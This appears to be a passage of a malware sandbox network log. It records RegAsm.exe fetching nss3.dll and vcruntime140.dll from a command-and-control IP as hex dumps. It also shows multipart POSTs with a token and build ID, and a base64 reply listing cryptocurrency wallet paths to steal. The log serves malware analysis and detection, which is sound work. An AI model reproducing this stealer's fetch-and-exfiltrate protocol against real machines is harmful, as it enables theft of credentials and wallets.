                                                                                                      2024-09-26 17:05:50 UTC201OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:50 UTC261INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:50 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 80880
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:50 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:50 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                      2024-09-26 17:05:50 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                      Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                      2024-09-26 17:05:51 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                      Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                      2024-09-26 17:05:51 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                      Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                      2024-09-26 17:05:51 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                      Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.5497315.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:51 UTC193OUTGET /nss3.dll HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:52 UTC263INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:52 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 2046288
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:52 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:52 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                      Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                      Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                      Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                      Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                      Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                      Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                      Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                      Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                      2024-09-26 17:05:52 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                      Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.5497325.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:54 UTC278OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJ
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 1145
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:54 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJDAKFBFBFBAAAAAEBKJCont
                                                                                                      2024-09-26 17:05:55 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:55 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.5497335.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:56 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 331
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GCGCBAECFCAKKEBFCFIICont
                                                                                                      2024-09-26 17:05:56 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:56 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:56 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
